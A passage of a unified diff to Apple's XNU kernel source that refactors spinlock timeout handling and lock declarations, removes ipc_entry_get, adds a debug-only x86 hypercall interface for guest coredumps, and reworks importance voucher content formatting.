+       boolean_t lrval = (boolean_t)usimple_lock_try_nopreempt((usimple_lock_t) lck, LCK_GRP_NULL);
+#if     DEVELOPMENT || DEBUG
+       if (lrval) {
+               pltrace(FALSE);
+       }
+#endif
+       return lrval;
+}
+
+int
+lck_spin_try_lock_nopreempt_grp(
+       lck_spin_t      *lck,
+       lck_grp_t       *grp)
+{
+#pragma unused(grp)
+       boolean_t lrval = (boolean_t)usimple_lock_try_nopreempt((usimple_lock_t) lck, grp);
+#if     DEVELOPMENT || DEBUG
+       if (lrval) {
+               pltrace(FALSE);
+       }
+#endif
+       return lrval;
+}
+
 /*
  *     Routine:        lck_spin_assert
  */
@@ -439,12 +499,8 @@ usimple_lock_init(
        usimple_lock_t  l,
        __unused unsigned short tag)
 {
-#ifndef MACHINE_SIMPLE_LOCK
        USLDBG(usld_lock_init(l, tag));
        hw_lock_init(&l->interlock);
-#else
-       simple_lock_init((simple_lock_t)l, tag);
-#endif
 }
 
 volatile uint32_t spinlock_owner_cpu = ~0;
@@ -469,6 +525,22 @@ spinlock_timeout_NMI(uintptr_t thread_addr)
        return spinlock_owner_cpu;
 }
 
+__abortlike
+static void
+usimple_lock_acquire_timeout_panic(usimple_lock_t l)
+{
+       uintptr_t lowner = (uintptr_t)l->interlock.lock_data;
+       uint32_t lock_cpu;
+
+       spinlock_timed_out = l; /* spinlock_timeout_NMI consumes this */
+       lock_cpu = spinlock_timeout_NMI(lowner);
+       panic("Spinlock acquisition timed out: lock=%p, "
+           "lock owner thread=0x%lx, current_thread: %p, "
+           "lock owner active on CPU 0x%x, current owner: 0x%lx, time: %llu",
+           l, lowner, current_thread(), lock_cpu,
+           (uintptr_t)l->interlock.lock_data, mach_absolute_time());
+}
+
 /*
  *     Acquire a usimple_lock.
  *
@@ -481,38 +553,57 @@ void
        usimple_lock_t  l
        LCK_GRP_ARG(lck_grp_t *grp))
 {
-#ifndef MACHINE_SIMPLE_LOCK
        DECL_PC(pc);
 
        OBTAIN_PC(pc);
        USLDBG(usld_lock_pre(l, pc));
 
-       if (__improbable(hw_lock_to(&l->interlock, LockTimeOutTSC, grp) == 0)) {
-               boolean_t uslock_acquired = FALSE;
-               while (machine_timeout_suspended()) {
-                       enable_preemption();
-                       if ((uslock_acquired = hw_lock_to(&l->interlock, LockTimeOutTSC, grp))) {
-                               break;
-                       }
+       while (__improbable(hw_lock_to(&l->interlock, LockTimeOutTSC, grp) == 0)) {
+               if (!machine_timeout_suspended()) {
+                       usimple_lock_acquire_timeout_panic(l);
                }
+               enable_preemption();
+       }
+
+#if DEVELOPMENT || DEBUG
+       pltrace(FALSE);
+#endif
+
+       USLDBG(usld_lock_post(l, pc));
+#if CONFIG_DTRACE
+       LOCKSTAT_RECORD(LS_LCK_SPIN_LOCK_ACQUIRE, l, 0, (uintptr_t)LCK_GRP_PROBEARG(grp));
+#endif
+}
+
+/*
+ *     Acquire a usimple_lock_nopreempt
+ *
+ *     Called and returns with preemption disabled.  Note
+ *     that the hw_lock routines are responsible for
+ *     maintaining preemption state.
+ */
+static void
+usimple_lock_nopreempt(
+       usimple_lock_t  l,
+       lck_grp_t *grp)
+{
+       DECL_PC(pc);
 
-               if (uslock_acquired == FALSE) {
-                       uint32_t lock_cpu;
-                       uintptr_t lowner = (uintptr_t)l->interlock.lock_data;
-                       spinlock_timed_out = l;
-                       lock_cpu = spinlock_timeout_NMI(lowner);
-                       panic("Spinlock acquisition timed out: lock=%p, lock owner thread=0x%lx, current_thread: %p, lock owner active on CPU 0x%x, current owner: 0x%lx, time: %llu",
-                           l, lowner, current_thread(), lock_cpu, (uintptr_t)l->interlock.lock_data, mach_absolute_time());
+       OBTAIN_PC(pc);
+       USLDBG(usld_lock_pre(l, pc));
+
+       while (__improbable(hw_lock_to_nopreempt(&l->interlock, LockTimeOutTSC, grp) == 0)) {
+               if (!machine_timeout_suspended()) {
+                       usimple_lock_acquire_timeout_panic(l);
                }
+               enable_preemption();
        }
+
 #if DEVELOPMENT || DEBUG
        pltrace(FALSE);
 #endif
 
        USLDBG(usld_lock_post(l, pc));
-#else
-       simple_lock((simple_lock_t)l, grp);
-#endif
 #if CONFIG_DTRACE
        LOCKSTAT_RECORD(LS_LCK_SPIN_LOCK_ACQUIRE, l, 0, (uintptr_t)LCK_GRP_PROBEARG(grp));
 #endif
@@ -530,7 +621,6 @@ void
 usimple_unlock(
        usimple_lock_t  l)
 {
-#ifndef MACHINE_SIMPLE_LOCK
        DECL_PC(pc);
 
        OBTAIN_PC(pc);
@@ -539,11 +629,28 @@ usimple_unlock(
        pltrace(TRUE);
 #endif
        hw_lock_unlock(&l->interlock);
-#else
-       simple_unlock_rwmb((simple_lock_t)l);
-#endif
 }
 
+/*
+ *     Release a usimple_unlock_nopreempt.
+ *
+ *     Called and returns with preemption enabled.  Note
+ *     that the hw_lock routines are responsible for
+ *     maintaining preemption state.
+ */
+void
+usimple_unlock_nopreempt(
+       usimple_lock_t  l)
+{
+       DECL_PC(pc);
+
+       OBTAIN_PC(pc);
+       USLDBG(usld_unlock(l, pc));
+#if DEVELOPMENT || DEBUG
+       pltrace(TRUE);
+#endif
+       hw_lock_unlock_nopreempt(&l->interlock);
+}
 
 /*
  *     Conditionally acquire a usimple_lock.
@@ -562,7 +669,6 @@ usimple_lock_try(
        usimple_lock_t  l,
        lck_grp_t *grp)
 {
-#ifndef MACHINE_SIMPLE_LOCK
        unsigned int    success;
        DECL_PC(pc);
 
@@ -575,9 +681,36 @@ usimple_lock_try(
                USLDBG(usld_lock_try_post(l, pc));
        }
        return success;
-#else
-       return simple_lock_try((simple_lock_t)l, grp);
+}
+
+/*
+ *     Conditionally acquire a usimple_lock.
+ *
+ *     Called and returns with preemption disabled.  Note
+ *     that the hw_lock routines are responsible for
+ *     maintaining preemption state.
+ *
+ *     XXX No stats are gathered on a miss; I preserved this
+ *     behavior from the original assembly-language code, but
+ *     doesn't it make sense to log misses?  XXX
+ */
+static unsigned int
+usimple_lock_try_nopreempt(
+       usimple_lock_t  l,
+       lck_grp_t *grp)
+{
+       unsigned int    success;
+       DECL_PC(pc);
+
+       OBTAIN_PC(pc);
+       USLDBG(usld_lock_try_pre(l, pc));
+       if ((success = hw_lock_try_nopreempt(&l->interlock, grp))) {
+#if DEVELOPMENT || DEBUG
+               pltrace(FALSE);
 #endif
+               USLDBG(usld_lock_try_post(l, pc));
+       }
+       return success;
 }
 
 /*
index 6ebfd9a7e9df5caa680ef53a281bceb6ae51ea07..7d0e21dac17811cc6e8ccc4250a3049a1bc94d82 100644 (file)
@@ -1237,11 +1237,6 @@ ml_cpu_can_exit(__unused int cpu_id)
        return true;
 }
 
-void
-ml_cpu_init_state(void)
-{
-}
-
 void
 ml_cpu_begin_state_transition(__unused int cpu_id)
 {
index 603fb000860fa3046962d6bf80847c757632653b..29bff1a8f7b54c3a0a053dc4eb908430f93e8566 100644 (file)
@@ -63,7 +63,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/kalloc.h>
 #include <kern/mach_param.h>
 #include <kern/processor.h>
index 6960a022ed8929b7df7fb20d207e2cbd9ffb162b..207db2d6395518ebec0d4709118db00e496c1a4e 100644 (file)
@@ -63,7 +63,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/mach_param.h>
 #include <kern/processor.h>
 #include <kern/cpu_data.h>
index 130c8aec357f3565be6a727162121c57310d762c..642f9f21692e47beae649bdb6d0800019dad6b0f 100644 (file)
@@ -63,7 +63,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/mach_param.h>
 #include <kern/task.h>
 #include <kern/thread.h>
index 34a434d7d3443267429cdd646c32d633c3807b42..eb470b06ebf474c268999de3d3f1e47e1143b7c2 100644 (file)
@@ -842,6 +842,10 @@ extern boolean_t pmap_is_empty(pmap_t           pmap,
 kern_return_t
     pmap_permissions_verify(pmap_t, vm_map_t, vm_offset_t, vm_offset_t);
 
+#if DEVELOPMENT || DEBUG
+extern kern_return_t pmap_test_text_corruption(pmap_paddr_t);
+#endif /* DEVELOPMENT || DEBUG */
+
 #if MACH_ASSERT
 extern int pmap_stats_assert;
 #define PMAP_STATS_ASSERTF(args)                \
index 4c5d43d09aff6a1cc3997691dcb6b9b7f71b47f1..12d593dc3c00b0c92480accc86138ebf8c976624 100644 (file)
@@ -60,60 +60,8 @@ update_microcode(void)
 }
 
 /* locks */
-static lck_grp_attr_t *ucode_slock_grp_attr = NULL;
-static lck_grp_t *ucode_slock_grp = NULL;
-static lck_attr_t *ucode_slock_attr = NULL;
-static lck_spin_t *ucode_slock = NULL;
-
-static kern_return_t
-register_locks(void)
-{
-       /* already allocated? */
-       if (ucode_slock_grp_attr && ucode_slock_grp && ucode_slock_attr && ucode_slock) {
-               return KERN_SUCCESS;
-       }
-
-       /* allocate lock group attribute and group */
-       if (!(ucode_slock_grp_attr = lck_grp_attr_alloc_init())) {
-               goto nomem_out;
-       }
-
-       if (!(ucode_slock_grp = lck_grp_alloc_init("uccode_lock", ucode_slock_grp_attr))) {
-               goto nomem_out;
-       }
-
-       /* Allocate lock attribute */
-       if (!(ucode_slock_attr = lck_attr_alloc_init())) {
-               goto nomem_out;
-       }
-
-       /* Allocate the spin lock */
-       /* We keep one global spin-lock. We could have one per update
-        * request... but srsly, why would you update microcode like that?
-        */
-       if (!(ucode_slock = lck_spin_alloc_init(ucode_slock_grp, ucode_slock_attr))) {
-               goto nomem_out;
-       }
-
-       return KERN_SUCCESS;
-
-nomem_out:
-       /* clean up */
-       if (ucode_slock) {
-               lck_spin_free(ucode_slock, ucode_slock_grp);
-       }
-       if (ucode_slock_attr) {
-               lck_attr_free(ucode_slock_attr);
-       }
-       if (ucode_slock_grp) {
-               lck_grp_free(ucode_slock_grp);
-       }
-       if (ucode_slock_grp_attr) {
-               lck_grp_attr_free(ucode_slock_grp_attr);
-       }
-
-       return KERN_NO_SPACE;
-}
+static LCK_GRP_DECLARE(ucode_slock_grp, "uccode_lock");
+static LCK_SPIN_DECLARE(ucode_slock, &ucode_slock_grp);
 
 /* Copy in an update */
 static int
@@ -168,13 +116,13 @@ static void
 cpu_apply_microcode(void)
 {
        /* grab the lock */
-       lck_spin_lock(ucode_slock);
+       lck_spin_lock(&ucode_slock);
 
        /* execute the update */
        update_microcode();
 
        /* release the lock */
-       lck_spin_unlock(ucode_slock);
+       lck_spin_unlock(&ucode_slock);
 }
 
 static void
@@ -245,10 +193,6 @@ xcpu_update(void)
 {
        cpumask_t dest_cpumask;
 
-       if (register_locks() != KERN_SUCCESS) {
-               return;
-       }
-
        mp_disable_preemption();
        dest_cpumask = CPUMASK_OTHERS;
        cpu_apply_microcode();
index efd2ff662cb71d71e297806f973c3efc315fa248..f9cf56840f45b9f529c97bc6a87d4dff5c05a12a 100644 (file)
@@ -42,8 +42,8 @@
 int vmx_use_count = 0;
 boolean_t vmx_exclusive = FALSE;
 
-lck_grp_t *vmx_lck_grp = NULL;
-lck_mtx_t *vmx_lck_mtx = NULL;
+static LCK_GRP_DECLARE(vmx_lck_grp, "vmx");
+static LCK_MTX_DECLARE(vmx_lck_mtx, &vmx_lck_grp);
 
 /* -----------------------------------------------------------------------------
 *  vmx_is_available()
@@ -115,16 +115,6 @@ vmx_enable(void)
        set_cr4(get_cr4() | CR4_VMXE);
 }
 
-void
-vmx_init()
-{
-       vmx_lck_grp = lck_grp_alloc_init("vmx", LCK_GRP_ATTR_NULL);
-       assert(vmx_lck_grp);
-
-       vmx_lck_mtx = lck_mtx_alloc_init(vmx_lck_grp, LCK_ATTR_NULL);
-       assert(vmx_lck_mtx);
-}
-
 /* -----------------------------------------------------------------------------
 *  vmx_get_specs()
 *       Obtain VMX facility specifications for this CPU and
@@ -313,7 +303,7 @@ host_vmxon(boolean_t exclusive)
                return VMX_UNSUPPORTED;
        }
 
-       lck_mtx_lock(vmx_lck_mtx);
+       lck_mtx_lock(&vmx_lck_mtx);
 
        if (vmx_exclusive || (exclusive && vmx_use_count)) {
                error = VMX_INUSE;
@@ -331,7 +321,7 @@ host_vmxon(boolean_t exclusive)
                error = VMX_OK;
        }
 
-       lck_mtx_unlock(vmx_lck_mtx);
+       lck_mtx_unlock(&vmx_lck_mtx);
 
        return error;
 }
@@ -345,7 +335,7 @@ host_vmxoff()
 {
        assert(0 == get_preemption_level());
 
-       lck_mtx_lock(vmx_lck_mtx);
+       lck_mtx_lock(&vmx_lck_mtx);
 
        if (1 == vmx_use_count) {
                vmx_exclusive = FALSE;
@@ -356,7 +346,7 @@ host_vmxoff()
                vmx_use_count--;
        }
 
-       lck_mtx_unlock(vmx_lck_mtx);
+       lck_mtx_unlock(&vmx_lck_mtx);
 
        VMX_KPRINTF("VMX use count: %d\n", vmx_use_count);
 }
index eb939086151d664ffe7d2188dc507bf2b2f26b8b..7edea3f5b184c84b16efc7a04e853f911c9626fc 100644 (file)
@@ -60,7 +60,6 @@ typedef struct vmx_cpu {
        void            *vmxon_region;  /* the logical address of the VMXON region page */
 } vmx_cpu_t;
 
-void vmx_init(void);
 void vmx_cpu_init(void);
 void vmx_resume(boolean_t is_wake_from_hibernate);
 void vmx_suspend(void);
diff --git a/osfmk/i386/x86_hypercall.c b/osfmk/i386/x86_hypercall.c
new file mode 100644 (file)
index 0000000..e76e38d
--- /dev/null
@@ -0,0 +1,96 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/assert.h>
+#include <kern/hvg_hypercall.h>
+#include <i386/cpuid.h>
+#include <os/log.h>
+
+
+static bool
+hvg_live_coredump_enabled(void)
+{
+       return cpuid_vmm_present() && (cpuid_vmm_get_applepv_features() & CPUID_LEAF_FEATURE_COREDUMP) != 0;
+}
+
+/*
+ * This routine issues an Apple hypercall that notifies the hypervisor to
+ * take a guest kernel coredump. If the vmcore argument is not NULL, the
+ * name tag of the vmcore file is copied into the caller's vmcore tag array.
+ * Otherwise the name tag is ignored.
+ */
+
+hvg_hcall_return_t
+hvg_hcall_trigger_dump(hvg_hcall_vmcore_file_t *vmcore,
+    const hvg_hcall_dump_option_t dump_option)
+{
+       hvg_hcall_return_t ret;
+       hvg_hcall_output_regs_t output;
+       const size_t reg_size = sizeof(output.rax);
+
+       /* Does the hypervisor support feature: live kernel core dump? */
+       if (!hvg_live_coredump_enabled()) {
+               return HVG_HCALL_FEAT_DISABLED;
+       }
+
+       /* Make sure that we don't overflow vmcore tag array with hypercall output */
+       if (vmcore && (reg_size != sizeof(uint64_t))) {
+               os_log_error(OS_LOG_DEFAULT, "%s: invalid hcall register size, %zu bytes (expect %zu bytes)\n",
+                   __func__, reg_size, sizeof(uint64_t));
+               return HVG_HCALL_INVALID_PARAMETER;
+       }
+
+       switch (dump_option) {
+       case HVG_HCALL_DUMP_OPTION_REGULAR:
+               /* Only regular dump-guest-memory is supported for now */
+               break;
+       default:
+               return HVG_HCALL_INVALID_PARAMETER;
+       }
+
+       /* Everything checks out, issue hypercall */
+       memset(&output, 0, sizeof(hvg_hcall_output_regs_t));
+       ret = hvg_hypercall1(HVG_HCALL_TRIGGER_DUMP,
+           dump_option,
+           &output);
+
+       if (ret == HVG_HCALL_SUCCESS) {
+               if (vmcore) {
+                       /* Caller requested vmcore tag to be returned */
+                       memcpy(&vmcore->tag[0], &output.rax, reg_size);
+                       memcpy(&vmcore->tag[reg_size], &output.rdi, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 2], &output.rsi, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 3], &output.rdx, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 4], &output.rcx, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 5], &output.r8, reg_size);
+                       memcpy(&vmcore->tag[reg_size * 6], &output.r9, reg_size);
+                       vmcore->tag[reg_size * 7] = '\0';
+               }
+       }
+       return ret;
+}
diff --git a/osfmk/i386/x86_hypercall.h b/osfmk/i386/x86_hypercall.h
new file mode 100644 (file)
index 0000000..7dedfcc
--- /dev/null
@@ -0,0 +1,182 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef _I386_X86_HYPERCALL_H_
+#define _I386_X86_HYPERCALL_H_
+
+#if DEBUG || DEVELOPMENT
+
+
+/*
+ * Apple Hypercall Calling Convention (x64)
+ *
+ * Registers |                Usage                       |
+ * --------------------------------------------------------
+ *      %rax |    In:  hypercall code                     |
+ *           |    Out: if RFLAGS.CF = 0 (success)         |
+ *           |           hypercall output[0]              |
+ *           |         if RFLAGS.CF = 1 (error)           |
+ *           |           hypercall error value            |
+ *      %rdi |    In:  1st argument                       |
+ *           |    Out: hypercall output[1]                |
+ *      %rsi |    In:  2nd argument                       |
+ *           |    Out: hypercall output[2]                |
+ *      %rdx |    In:  3rd argument                       |
+ *           |    Out: hypercall output[3]                |
+ *      %rcx |    In:  4th argument                       |
+ *           |    Out: hypercall output[4]                |
+ *      %r8  |    In:  5th argument                       |
+ *           |    Out: hypercall output[5]                |
+ *      %r9  |    In:  6th argument                       |
+ *           |    Out: hypercall output[6]                |
+ *
+ * %rax is used by the caller to specify hypercall code. When a hypercall fails,
+ * the hypervisor stores errno in %rax. A successful hypercall returns the
+ * output of the call in %rax, %rdi, %rsi, %rdx, %rcx, %r8, and %r9.
+ */
+
+typedef struct hvg_hcall_output_regs {
+       uint64_t   rax;
+       uint64_t   rdi;
+       uint64_t   rsi;
+       uint64_t   rdx;
+       uint64_t   rcx;
+       uint64_t   r8;
+       uint64_t   r9;
+} hvg_hcall_output_regs_t;
+
+/*
+ * To avoid collision with other hypercall interfaces (e.g., KVM) in the vmcall
+ * namespace, Apple hypercalls put "A" (0x41) in the top byte of %eax so that
+ * hypervisors can support multiple hypercall interfaces simultaneously and
+ * handle Apple hypercalls correctly for compatiblity.
+ *
+ * For example, KVM uses the same vmcall instruction and has call code 1 for
+ * KVM_HC_VAPIC_POLL_IRQ. When invoking an Apple hypercall with code 1, a
+ * hypervisor will not accidentially treat the Apple hypercall as a KVM call.
+ */
+
+#define HVG_HCALL_CODE(code) ('A' << 24 | (code & 0xFFFFFF))
+
+
+/*
+ * Caller is responsible for checking the existence of Apple Hypercall
+ * before invoking Apple hypercalls.
+ */
+
+#define HVG_HCALL_RETURN(rax) {\
+       __asm__ __volatile__ goto (\
+                                  "jnc 2f  \n\t" \
+                                  "jmp %l0 \n\t" \
+                                  "2:      \n\t" \
+                                 : /* no output */ \
+                                 : /* no input */  \
+                                 : /* no clobber */ \
+                                 : error);\
+       return HVG_HCALL_SUCCESS;\
+error:\
+       return (hvg_hcall_return_t)rax;\
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall6(uint64_t code, uint64_t rdi, uint64_t rsi, uint64_t rdx, uint64_t rcx, uint64_t r8, uint64_t r9,
+    hvg_hcall_output_regs_t *output)
+{
+       __asm__ __volatile__ ("movq %12, %%r8  \n\t"
+                          "movq %13, %%r9  \n\t"
+                          "vmcall          \n\t"
+                          "movq %%r8, %5   \n\t"
+                          "movq %%r9, %6   \n\t"
+                        : "=a" (output->rax),         /* %0:  output[0] */
+                          "=D" (output->rdi),         /* %1:  output[1] */
+                          "=S" (output->rsi),         /* %2:  output[2] */
+                          "=d" (output->rdx),         /* %3:  output[3] */
+                          "=c" (output->rcx),         /* %4:  output[4] */
+                          "=r" (output->r8),          /* %5:  output[5] */
+                          "=r" (output->r9)           /* %6:  output[6] */
+                        : "a"  (HVG_HCALL_CODE(code)),/* %7:  call code */
+                          "D"  (rdi),                 /* %8:  arg[0]    */
+                          "S"  (rsi),                 /* %9:  arg[1]    */
+                          "d"  (rdx),                 /* %10: arg[2]    */
+                          "c"  (rcx),                 /* %11: arg[3]    */
+                          "r"  (r8),                  /* %12: arg[4]    */
+                          "r"  (r9)                   /* %13: arg[5]    */
+                        : "memory", "r8", "r9");
+       HVG_HCALL_RETURN(output->rax);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall0(const uint64_t code,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, 0, 0, 0, 0, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall1(const uint64_t code,
+    const uint64_t rdi,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, 0, 0, 0, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall2(const uint64_t code,
+    const uint64_t rdi, const uint64_t rsi,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, rsi, 0, 0, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall3(const uint64_t code,
+    const uint64_t rdi, const uint64_t rsi, const uint64_t rdx,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, rsi, rdx, 0, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall4(const uint64_t code,
+    const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, const uint64_t rcx,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, rsi, rdx, rcx, 0, 0, output);
+}
+
+static inline hvg_hcall_return_t
+hvg_hypercall5(const uint64_t code,
+    const uint64_t rdi, const uint64_t rsi, const uint64_t rdx, const uint64_t rcx, const uint64_t r8,
+    hvg_hcall_output_regs_t *output)
+{
+       return hvg_hypercall6(code, rdi, rsi, rdx, rcx, r8, 0, output);
+}
+
+#endif /* DEBUG || DEVELOPMENT */
+
+#endif /* _I386_X86_HYPERCALL_H_ */
index e05803973ecf40d998226036c7c8194c6f792c25..4195a3acaf808f93e99b1f22035b0dfd7b65298d 100644 (file)
@@ -223,34 +223,6 @@ ipc_entry_claim(
        return KERN_SUCCESS;
 }
 
-/*
- *     Routine:        ipc_entry_get
- *     Purpose:
- *             Tries to allocate an entry out of the space.
- *     Conditions:
- *             The space is write-locked and active throughout.
- *             An object may be locked.  Will not allocate memory.
- *     Returns:
- *             KERN_SUCCESS            A free entry was found.
- *             KERN_NO_SPACE           No entry allocated.
- */
-
-kern_return_t
-ipc_entry_get(
-       ipc_space_t             space,
-       mach_port_name_t        *namep,
-       ipc_entry_t             *entryp)
-{
-       kern_return_t kr;
-
-       kr = ipc_entries_hold(space, 1);
-       if (KERN_SUCCESS != kr) {
-               return kr;
-       }
-
-       return ipc_entry_claim(space, namep, entryp);
-}
-
 /*
  *     Routine:        ipc_entry_alloc
  *     Purpose:
@@ -281,9 +253,9 @@ ipc_entry_alloc(
                        return KERN_INVALID_TASK;
                }
 
-               kr = ipc_entry_get(space, namep, entryp);
+               kr = ipc_entries_hold(space, 1);
                if (kr == KERN_SUCCESS) {
-                       return kr;
+                       return ipc_entry_claim(space, namep, entryp);
                }
 
                kr = ipc_entry_grow_table(space, ITS_SIZE_NONE);
@@ -409,7 +381,6 @@ ipc_entry_alloc_name(
                 */
                kern_return_t kr;
                kr = ipc_entry_grow_table(space, index + 1);
-               assert(kr != KERN_NO_SPACE);
                if (kr != KERN_SUCCESS) {
                        /* space is unlocked */
                        return kr;
index 5601b84c82283a1ba511b5b0fcbc47bd4d3f4bb2..781cc5c1c73c7c54f016d0b4f7003ec9967a7ea0 100644 (file)
@@ -235,12 +235,6 @@ extern kern_return_t ipc_entry_claim(
        mach_port_name_t        *namep,
        ipc_entry_t             *entryp);
 
-/* Allocate an entry in a space */
-extern kern_return_t ipc_entry_get(
-       ipc_space_t             space,
-       mach_port_name_t        *namep,
-       ipc_entry_t             *entryp);
-
 /* Allocate an entry in a space, growing the space if necessary */
 extern kern_return_t ipc_entry_alloc(
        ipc_space_t             space,
index 87a31f7842139ab1f87a31dec2a9737c285de4dd..7e461457fa8bde950e0cfa4c533cf363abe0b8a3 100644 (file)
@@ -1009,7 +1009,7 @@ convert_port_to_eventlink_locked(
 
        if (ip_active(port) &&
            ip_kotype(port) == IKOT_EVENTLINK) {
-               ipc_eventlink = (struct ipc_eventlink *)port->ip_kobject;
+               ipc_eventlink = (struct ipc_eventlink *)ipc_kobject_get(port);
 
                if (ipc_eventlink) {
                        ipc_eventlink_reference(ipc_eventlink);
index bc3980f2dfe8f74277399011a6076022ad14ba3a..2c76a72811965fd93790f2abb5811e06d5595d5f 100644 (file)
@@ -1997,6 +1997,16 @@ task_importance_update_owner_info(task_t task)
 }
 #endif
 
+static int
+task_importance_task_get_pid(ipc_importance_task_t iit)
+{
+#if DEVELOPMENT || DEBUG
+       return (int)iit->iit_bsd_pid;
+#else
+       return task_pid(iit->iit_task);
+#endif
+}
+
 /*
  *     Routine:        ipc_importance_reset_locked
  *     Purpose:
@@ -2034,13 +2044,6 @@ ipc_importance_reset_locked(ipc_importance_task_t task_imp, boolean_t donor)
        task_imp->iit_legacy_externdrop = 0;
        after_donor = ipc_importance_task_is_donor(task_imp);
 
-#if DEVELOPMENT || DEBUG
-       if (task_imp->iit_assertcnt > 0 && task_imp->iit_live_donor) {
-               printf("Live donor task %s[%d] still has %d importance assertions after reset\n",
-                   task_imp->iit_procname, task_imp->iit_bsd_pid, task_imp->iit_assertcnt);
-       }
-#endif
-
        /* propagate a downstream drop if there was a change in donor status */
        if (after_donor != before_donor) {
                ipc_importance_task_propagate_assertion_locked(task_imp, IIT_UPDATE_DROP, FALSE);
@@ -3260,7 +3263,8 @@ ipc_importance_receive(
                 * will trigger the probe in ipc_importance_task_externalize_assertion()
                 * above and have impresult==1 here.
                 */
-               DTRACE_BOOST5(receive_boost, task_t, task_self, int, task_pid(task_self), int, sender_pid, int, 1, int, task_self->task_imp_base->iit_assertcnt);
+               DTRACE_BOOST5(receive_boost, task_t, task_self, int, task_pid(task_self),
+                   int, sender_pid, int, 1, int, task_self->task_imp_base->iit_assertcnt);
        }
 #endif /* IMPORTANCE_TRACE */
 }
@@ -3587,59 +3591,61 @@ ipc_importance_extract_content(
        mach_voucher_attr_content_t                     out_content,
        mach_voucher_attr_content_size_t                *in_out_content_size)
 {
-       mach_voucher_attr_content_size_t size = 0;
        ipc_importance_elem_t elem;
        unsigned int i;
 
+       char *buf = (char *)out_content;
+       mach_voucher_attr_content_size_t size = *in_out_content_size;
+       mach_voucher_attr_content_size_t pos = 0;
+       __unused int pid;
+
        IMPORTANCE_ASSERT_MANAGER(manager);
        IMPORTANCE_ASSERT_KEY(key);
 
        /* the first non-default value provides the data */
-       for (i = 0; i < value_count && *in_out_content_size > 0; i++) {
+       for (i = 0; i < value_count; i++) {
                elem = (ipc_importance_elem_t)values[i];
                if (IIE_NULL == elem) {
                        continue;
                }
 
-               snprintf((char *)out_content, *in_out_content_size, "Importance for pid ");
-               size = (mach_voucher_attr_content_size_t)strlen((char *)out_content);
+               pos += scnprintf(buf + pos, size - pos, "Importance for ");
 
                for (;;) {
                        ipc_importance_inherit_t inherit = III_NULL;
                        ipc_importance_task_t task_imp;
-                       task_t task;
-                       int t_pid;
 
                        if (IIE_TYPE_TASK == IIE_TYPE(elem)) {
                                task_imp = (ipc_importance_task_t)elem;
-                               task = task_imp->iit_task;
-                               t_pid = (TASK_NULL != task) ?
-                                   task_pid(task) : -1;
-                               snprintf((char *)out_content + size, *in_out_content_size - size, "%d", t_pid);
                        } else {
                                inherit = (ipc_importance_inherit_t)elem;
                                task_imp = inherit->iii_to_task;
-                               task = task_imp->iit_task;
-                               t_pid = (TASK_NULL != task) ?
-                                   task_pid(task) : -1;
-                               snprintf((char *)out_content + size, *in_out_content_size - size,
